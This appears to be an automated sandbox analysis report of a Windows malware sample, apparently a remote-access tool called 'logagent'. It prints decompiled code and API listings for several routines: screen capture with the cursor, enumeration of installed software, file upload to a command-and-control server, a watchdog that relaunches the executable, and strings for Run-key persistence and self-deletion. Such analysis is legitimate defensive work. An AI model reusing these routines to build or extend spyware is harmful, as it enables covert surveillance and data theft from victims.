                                  • String ID: ")$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\uninstall.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                  • API String ID: 4026913539-546584676
                                  • Opcode ID: 9bc248cd9fe04f0f2b4b3d098964f51d31cdf6e9861adf38e66a57827838d369
                                  • Instruction ID: 4759749fa9a93480e8798f104ff06792d31013b0e42c9834499dc68fb1b0d0e4
                                  • Opcode Fuzzy Hash: 9bc248cd9fe04f0f2b4b3d098964f51d31cdf6e9861adf38e66a57827838d369
                                  • Instruction Fuzzy Hash: FA917172900509BBDB00EBE0ED4DAEE777CEF94305F14806AF902A2191DF795E44CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040FA46 Relevance: 91.3, APIs: 49, Strings: 3, Instructions: 318windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E0040FA46(void* __eflags, intOrPtr _a4, signed int _a8, char _a11, signed int _a12) {
				struct HDC__* _v8;
				void* _v12;
				struct HDC__* _v16;
				int _v20;
				int _v24;
				int _v28;
				char _v44;
				intOrPtr _v50;
				void* _v52;
				void* _v54;
				intOrPtr _v58;
				char _v60;
				char _v76;
				intOrPtr _v80;
				struct tagCURSORINFO _v96;
				signed int _v102;
				signed int _v104;
				long _v112;
				long _v116;
				char _v120;
				struct _ICONINFO _v140;
				int _t143;
				void* _t144;
				signed int _t153;
				long _t164;
				void* _t165;
				char* _t189;
				signed int _t193;
				void* _t214;
				signed int _t222;
				signed char _t224;
				signed int _t225;
				signed int _t242;
				struct HDC__* _t245;
				int _t249;
				struct tagBITMAPINFO* _t250;

				_t214 = 0;
				_t245 = CreateDCA("DISPLAY", 0, 0, 0);
				_v16 = _t245;
				_v8 = CreateCompatibleDC(_t245);
				_t248 = 0x41bfc8 + _a12 * 4;
				_v12 = E0040FECE( *((intOrPtr*)(0x41bfc8 + _a12 * 4)));
				_t143 = E0040FF18( *(0x41bfc8 + _a12 * 4));
				_v28 = _t143;
				if(_v12 != 0 || _t143 != 0) {
					_t144 = CreateCompatibleBitmap(_t245, _v12, _t143);
					_a12 = _t144;
					if(_t144 != _t214) {
						if(SelectObject(_v8, _t144) != 0) {
							_v24 = _t214;
							asm("stosd");
							E0040FF57( *_t248,  &_v24);
							if(StretchBlt(_v8, _t214, _t214, _v12, _v28, _v16, _v24, _v20, _v12, _v28, 0xcc0020) != 0) {
								if(_a8 != 0) {
									_v96.cbSize = 0x14;
									if(GetCursorInfo( &_v96) != 0 && GetIconInfo(_v96.hCursor,  &_v140) != 0) {
										DeleteObject(_v140.hbmColor);
										DeleteObject(_v140.hbmMask);
										DrawIcon(_v8, _v96.ptScreenPos - _v140.xHotspot - _v24, _v80 - _v140.yHotspot - _v20, _v96.hCursor);
										_t214 = 0;
									}
								}
								_push( &_v120);
								_t249 = 0x18;
								if(GetObjectA(_a12, _t249, ??) != 0) {
									_t153 = _v102 * _v104;
									_t242 = 1;
									if(_t153 != _t242) {
										_t222 = 4;
										if(_t153 > _t222) {
											_t222 = 8;
											if(_t153 <= _t222) {
												goto L18;
											}
											_t222 = 0x10;
											if(_t153 <= _t222) {
												goto L18;
											}
											if(_t153 > _t249) {
												_a8 = 0x20;
												L28:
												_push(0x28 + (_t242 << _a8) * 4);
												L23:
												_t250 = LocalAlloc(0x40, ??);
												_t224 = _a8;
												_t250->bmiHeader = 0x28;
												_t250->bmiHeader.biWidth = _v116;
												_t250->bmiHeader.biHeight = _v112;
												_t250->bmiHeader.biPlanes = _v104;
												_t250->bmiHeader.biBitCount = _v102;
												if(_t224 < 0x18) {
													_t193 = 1;
													_t250->bmiHeader.biClrUsed = _t193 << _t224;
												}
												_t225 = 8;
												asm("cdq");
												_t250->bmiHeader.biCompression = _t214;
												_t250->bmiHeader.biClrImportant = _t214;
												_t164 = (_t250->bmiHeader.biWidth + 7) / _t225 * (_a8 & 0x0000ffff) * _t250->bmiHeader.biHeight;
												_t250->bmiHeader.biSizeImage = _t164;
												_t165 = GlobalAlloc(_t214, _t164);
												_v12 = _t165;
												if(_t165 != _t214) {
													if(GetDIBits(_v8, _a12, _t214, _t250->bmiHeader.biHeight & 0x0000ffff, _t165, _t250, _t214) != 0) {
														_v60 = 0x4d42;
														_v54 = _t214;
														_v52 = _t214;
														_v58 = _t250->bmiHeader.biSizeImage + _t250->bmiHeader.biClrUsed * 4 + _t250->bmiHeader + 0xe;
														_v50 = _t250->bmiHeader + 0xe + _t250->bmiHeader.biClrUsed * 4;
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z( &_v60, 0xe);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_t250, 0x28);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_v12, _t250->bmiHeader.biSizeImage);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														DeleteObject(_a12);
														GlobalFree(_v12);
														DeleteDC(_v16);
														DeleteDC(_v8);
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v76);
														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
														goto L33;
													}
													DeleteDC(_v16);
													DeleteDC(_v8);
													DeleteObject(_a12);
													GlobalFree(_v12);
													_t189 =  &_a11;
												} else {
													DeleteDC(_v16);
													DeleteDC(_v8);
													DeleteObject(_a12);
													_t189 =  &_a11;
												}
												goto L31;
											}
											_a8 = _t249;
											_push(0x28);
											goto L23;
										}
										L18:
										_a8 = _t222;
										goto L28;
									}
									_a8 = _t242;
									goto L28;
								} else {
									DeleteDC(_v16);
									DeleteDC(_v8);
									DeleteObject(_a12);
									_t189 =  &_a11;
									goto L31;
								}
							}
							DeleteDC(_v16);
							DeleteDC(_v8);
							DeleteObject(_a12);
							_t189 =  &_a11;
							goto L31;
						}
						DeleteDC(_t245);
						DeleteDC(_v8);
						DeleteObject(_a12);
						_t189 =  &_a11;
						goto L31;
					}
					DeleteDC(_t245);
					DeleteDC(_v8);
					DeleteObject(_t214);
					_t189 =  &_a11;
					goto L31;
				} else {
					_t189 =  &_a11;
					L31:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(0x415664, _t189);
					L33:
					return _a4;
				}
			}







































                                  0x0040fa51
                                  0x0040fa62
                                  0x0040fa65
                                  0x0040fa6e
                                  0x0040fa7b
                                  0x0040fa89
                                  0x0040fa8c
                                  0x0040fa96
                                  0x0040fa99
                                  0x0040faac
                                  0x0040fab4
                                  0x0040fab7
                                  0x0040fae2
                                  0x0040fb08
                                  0x0040fb0b
                                  0x0040fb12
                                  0x0040fb40
                                  0x0040fb6d
                                  0x0040fb72
                                  0x0040fb82
                                  0x0040fbb0
                                  0x0040fbb5
                                  0x0040fbbf
                                  0x0040fbc5
                                  0x0040fbc5
                                  0x0040fb82
                                  0x0040fbca
                                  0x0040fbcd
                                  0x0040fbda
                                  0x0040fbfe
                                  0x0040fc02
                                  0x0040fc06
                                  0x0040fc12
                                  0x0040fc16
                                  0x0040fc22
                                  0x0040fc26
                                  0x00000000
                                  0x00000000
                                  0x0040fc2a
                                  0x0040fc2e
                                  0x00000000
                                  0x00000000
                                  0x0040fc33
                                  0x0040fcc4
                                  0x0040fccb
                                  0x0040fcd7
                                  0x0040fc3e
                                  0x0040fc46
                                  0x0040fc48
                                  0x0040fc4f
                                  0x0040fc58
                                  0x0040fc5e
                                  0x0040fc65
                                  0x0040fc6d
                                  0x0040fc71
                                  0x0040fc75
                                  0x0040fc78
                                  0x0040fc78
                                  0x0040fc83
                                  0x0040fc84
                                  0x0040fc8b
                                  0x0040fc8e
                                  0x0040fc94
                                  0x0040fc9a
                                  0x0040fc9d
                                  0x0040fca5
                                  0x0040fca8
                                  0x0040fcf4
                                  0x0040fd2b
                                  0x0040fd3c
                                  0x0040fd40
                                  0x0040fd48
                                  0x0040fd57
                                  0x0040fd5e
                                  0x0040fd6b
                                  0x0040fd7a
                                  0x0040fd87
                                  0x0040fd93
                                  0x0040fda0
                                  0x0040fdaf
                                  0x0040fdbc
                                  0x0040fdc5
                                  0x0040fdca
                                  0x0040fdd9
                                  0x0040fdde
                                  0x0040fde7
                                  0x0040fdf0
                                  0x0040fdf9
                                  0x00000000
                                  0x0040fdf9
                                  0x0040fcff
                                  0x0040fd04
                                  0x0040fd09
                                  0x0040fd0e
                                  0x0040fd14
                                  0x0040fcaa
                                  0x0040fcb3
                                  0x0040fcb8
                                  0x0040fcbd
                                  0x0040fcbf
                                  0x0040fcbf
                                  0x00000000
                                  0x0040fca8
                                  0x0040fc39
                                  0x0040fc3c
                                  0x00000000
                                  0x0040fc3c
                                  0x0040fc18
                                  0x0040fc18
                                  0x00000000
                                  0x0040fc18
                                  0x0040fc08
                                  0x00000000
                                  0x0040fbdc
                                  0x0040fbe5
                                  0x0040fbea
                                  0x0040fbef
                                  0x0040fbf1
                                  0x00000000
                                  0x0040fbf1
                                  0x0040fbda
                                  0x0040fb4b
                                  0x0040fb50
                                  0x0040fb55
                                  0x0040fb5b
                                  0x00000000
                                  0x0040fb5b
                                  0x0040faeb
                                  0x0040faf0
                                  0x0040faf5
                                  0x0040fafb
                                  0x00000000
                                  0x0040fafb
                                  0x0040fac0
                                  0x0040fac5
                                  0x0040fac8
                                  0x0040face
                                  0x00000000
                                  0x0040fa9f
                                  0x0040fa9f
                                  0x0040fd17
                                  0x0040fd20
                                  0x0040fdff
                                  0x0040fe06
                                  0x0040fe06

                                  APIs
                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                  • CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                    • Part of subcall function 0040FECE: GetMonitorInfoW.USER32(?,?), ref: 0040FEEE
                                    • Part of subcall function 0040FF18: GetMonitorInfoW.USER32(0040FA91,?), ref: 0040FF38
                                  • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0040FAAC
                                  • DeleteDC.GDI32(00000000), ref: 0040FAC0
                                  • DeleteDC.GDI32(00000000), ref: 0040FAC5
                                  • DeleteObject.GDI32(00000000), ref: 0040FAC8
                                  • SelectObject.GDI32(00000000,00000000), ref: 0040FADA
                                  • DeleteDC.GDI32(00000000), ref: 0040FAEB
                                  • DeleteDC.GDI32(00000000), ref: 0040FAF0
                                  • DeleteObject.GDI32(00410983), ref: 0040FAF5
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD5E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD6B
                                  • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00004D42,0000000E), ref: 0040FD7A
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FD87
                                  • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,00000028), ref: 0040FD93
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDA0
                                  • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,?), ref: 0040FDAF
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDBC
                                  • DeleteObject.GDI32(00410983), ref: 0040FDC5
                                  • GlobalFree.KERNEL32 ref: 0040FDCA
                                  • DeleteDC.GDI32(00000000), ref: 0040FDD9
                                  • DeleteDC.GDI32(00000000), ref: 0040FDDE
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040FDE7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF0
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$Delete$??0?$basic_string@ObjectV01@@$?assign@?$basic_string@CreateD@1@@V01@V12@Y?$basic_string@$??1?$basic_string@CompatibleInfoMonitor$BitmapFreeGlobalSelect
                                  • String ID: $BM$DISPLAY
                                  • API String ID: 585525397-871886180
                                  • Opcode ID: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                  • Instruction ID: 6bc9ab2a81804b36ace2e86e9fd4fad5708e5c5067481f6dd5077a8177631ab2
                                  • Opcode Fuzzy Hash: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                  • Instruction Fuzzy Hash: 17C1E37190020DEFDF209FA0DC849DEBBB9FF48314F10843AE915A62A0D735AA59DF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403816 Relevance: 91.3, APIs: 50, Strings: 2, Instructions: 302fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                  • CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,0041B310,00000000), ref: 00403845
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040385C
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • GetFileSize.KERNEL32(00000000,?,?,0041B310,00000000), ref: 0040387B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 004038AA
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038C8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038D9
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004038EA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004038F3
                                  • ??2@YAPAXI@Z.MSVCRT ref: 00403940
                                  • SetFilePointer.KERNEL32(?,?,?,?), ref: 00403954
                                  • ReadFile.KERNEL32(?,?,0000FDE8,?,?), ref: 00403968
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 00403978
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?), ref: 0040398E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403B9B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BA4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BAD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$File$G@2@@std@@G@std@@$D@1@@G@1@@V01@@$??2@CreateD@2@@0@Hstd@@PointerReadSizeV10@@V?$basic_string@socket
                                  • String ID: Uploading file to C&C: $[INFO]
                                  • API String ID: 368904453-3151135581
                                  • Opcode ID: 2e7112c3a2b21cdbcd178a8ca4ad1c354f83c13bbd5c27c7c4e68fb240423237
                                  • Instruction ID: b6d78ebecc7f0a5a63fa064e60f12d61dcf64d9c80a512a797ec440d8275d993
                                  • Opcode Fuzzy Hash: 2e7112c3a2b21cdbcd178a8ca4ad1c354f83c13bbd5c27c7c4e68fb240423237
                                  • Instruction Fuzzy Hash: B8C107B1C0010DEBDF05EFA1EC89DEEBB78EF54345F10806AF415A21A1EB755A89CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004130BF Relevance: 86.0, APIs: 42, Strings: 7, Instructions: 239registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 004130DF
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004130F5
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00413116
                                  • RegEnumKeyExA.ADVAPI32 ref: 00413135
                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00413160
                                  • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 004131DD
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,0041623C), ref: 0041321D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00416AFC,0041623C), ref: 0041322D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@G@2@@0@Hstd@@OpenV?$basic_string@$?empty@?$basic_string@EnumV10@V10@0@
                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                  • API String ID: 1820998543-3714951968
                                  • Opcode ID: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                  • Instruction ID: 27b32b71c815465ffb7daa5c7642a7d313003b3f6ade3c30451be995a5edf32b
                                  • Opcode Fuzzy Hash: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                  • Instruction Fuzzy Hash: D791F87280011DEBCB10EB91DD49EEEBB7CEF54304F1444A6B506A3051EB759B88CFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040A906 Relevance: 77.3, APIs: 39, Strings: 5, Instructions: 271sleepsynchronizationstringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 36%
                                  			E0040A906(void* __eflags, long _a4) {
				char _v5;
				void* _v12;
				char _v28;
				void _v526;
				signed short _v528;
				short _v548;
				short _v1068;
				short _v1588;
				short _v2108;
				long _t38;
				void* _t40;
				void* _t45;
				long _t48;
				void* _t49;
				char _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				void* _t57;
				char _t59;
				void* _t60;
				char _t67;
				void* _t70;
				char _t81;
				intOrPtr* _t84;
				void* _t117;
				void* _t121;
				void* _t127;
				void* _t129;
				void* _t130;
				void* _t131;
				void* _t132;

				_t117 = 0;
				CreateMutexA(0, 1,  *0x41b15c);
				_t38 = GetModuleFileNameW(0,  &_v2108, 0x104);
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t40 = E0040B692(0x80000001,  &_v548, "exepath",  &_v548, 0x208, _t38, _t38);
				_t130 = _t129 + 0x1c;
				if(_t40 == 0) {
					exit(0);
				}
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
				if(E00412DDF( &_v548,  &_v28) == 0) {
					exit(_t117);
				}
				while(1) {
					_t45 = OpenProcess(0x100000, _t117, _a4);
					_v12 = _t45;
					WaitForSingleObject(_t45, 0xffffffff);
					CloseHandle(_v12);
					_t48 = GetCurrentProcessId();
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t49 = E0040B829(0x80000001, _t48, "WDH", _t48);
					_t131 = _t130 + 0x10;
					if(_t49 == 0) {
						break;
					}
					if(PathFileExistsW( &_v548) != 0) {
						L7:
						ShellExecuteW(_t117, L"open",  &_v548, _t117, _t117, 1);
						L10:
						do {
							L11:
							_t121 = "WD";
							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
							_t67 = E0040B4C8(0x41ba38, 0x80000001,  &_a4, _t121,  &_a4);
							_t131 = _t131 + 0x10;
							_v5 = _t67;
							_t141 = _t67;
							if(_t67 == 0) {
								Sleep(0x1f4);
							} else {
								__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t121);
								_push(_t67);
								_push(0x80000001);
								E0040B95B(_t141);
								_t131 = _t131 + 0xc;
							}
						} while (_v5 == 0);
						_t117 = 0;
						continue;
					}
					__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t70 = E00412D56( &_v28,  &_v548,  &_v548,  &_v548, _t117);
					_t131 = _t131 + 0x10;
					if(_t70 == 0) {
						memset( &_v1588, 0, 0x82 << 2);
						GetTempPathW(0x104,  &_v1588);
						GetTempFileNameW( &_v1588, L"temp_", 0,  &_v1068);
						lstrcatW( &_v1068, L".exe");
						__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
						_t81 = E00412D56( &_v28,  &_v1068,  &_v1068,  &_v1068, 0);
						_t131 = _t131 + 0x1c;
						__eflags = _t81;
						if(_t81 == 0) {
							goto L11;
						}
						__eflags = 0;
						ShellExecuteW(0, L"open",  &_v1068, 0, 0, 1);
						goto L10;
					}
					goto L7;
				}
				exit(1);
				_t132 = _t131 - 0x208;
				_t84 = __imp__??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z;
				_t50 =  *_t84(0x41ba28, 0x415800, _t117, 0x80000001, 0x41ba38, _t127);
				__eflags = _t50;
				if(_t50 == 0) {
					L22:
					__eflags =  *0x41bd68;
					if( *0x41bd68 == 0) {
						L27:
						__eflags = 0;
						return 0;
					}
					do {
						Sleep(0xbb8);
						__eflags =  *0x41ba21;
						if(__eflags != 0) {
							__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
							_t53 =  *0x41ba20; // 0x0
							_t54 =  *0x41bc64; // 0x0
							_t55 =  *0x41ba58; // 0x1
							_t50 = E00407D53(0x41ba48, _t55, _t54, _t53, _t50);
							_t132 = _t132 + 0x10;
						}
						__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
						__imp__?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
						__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
						_t50 = E0040B8F8(__eflags, 0x80000001, _t50 + _t50 + 2, "exepath", _t50 + _t50 + 2, _t50 + _t50 + 2, _t50, _t50, 3);
						_t132 = _t132 + 0x20;
						__eflags =  *0x41bd68;
					} while ( *0x41bd68 != 0);
					goto L27;
				} else {
					_v528 = _v528 & 0x00000000;
					_t57 = memset( &_v526, 0, 0x81 << 2);
					asm("stosw");
					__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t59 = E0040B692(0x80000001,  &_v528, "exepath",  &_v528, 0x410, _t57, _t57);
					_t132 = _t132 + 0x28;
					__eflags = _t59;
					if(_t59 != 0) {
						__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z( &_v528);
					}
					_t50 =  *_t84(0x41ba28, 0x415800);
					__eflags = _t50;
					if(_t50 == 0) {
						goto L22;
					} else {
						_t60 = 1;
						return _t60;
					}
				}
			}



































                                  0x0040a912
                                  0x0040a91d
                                  0x0040a930
                                  0x0040a93d
                                  0x0040a946
                                  0x0040a965
                                  0x0040a972
                                  0x0040a977
                                  0x0040a97c
                                  0x0040a97f
                                  0x0040a97f
                                  0x0040a98c
                                  0x0040a9a6
                                  0x0040a9a9
                                  0x0040a9a9
                                  0x0040a9af
                                  0x0040a9b8
                                  0x0040a9c1
                                  0x0040a9c4
                                  0x0040a9cd
                                  0x0040a9d3
                                  0x0040a9e1
                                  0x0040a9e9
                                  0x0040a9ee
                                  0x0040a9f3
                                  0x00000000
                                  0x00000000
                                  0x0040aa08
                                  0x0040aa32
                                  0x0040aad2
                                  0x0040aad2
                                  0x0040aad8
                                  0x0040aad8
                                  0x0040aadb
                                  0x0040aae4
                                  0x0040aaec
                                  0x0040aaf1
                                  0x0040aaf4
                                  0x0040aaf7
                                  0x0040aaf9
                                  0x0040ab15
                                  0x0040aafb
                                  0x0040aafe
                                  0x0040ab04
                                  0x0040ab05
                                  0x0040ab06
                                  0x0040ab0b
                                  0x0040ab0b
                                  0x0040ab1b
                                  0x0040ab21
                                  0x00000000
                                  0x0040ab21
                                  0x0040aa15
                                  0x0040aa1f
                                  0x0040aa26
                                  0x0040aa2b
                                  0x0040aa30
                                  0x0040aa55
                                  0x0040aa63
                                  0x0040aa7e
                                  0x0040aa90
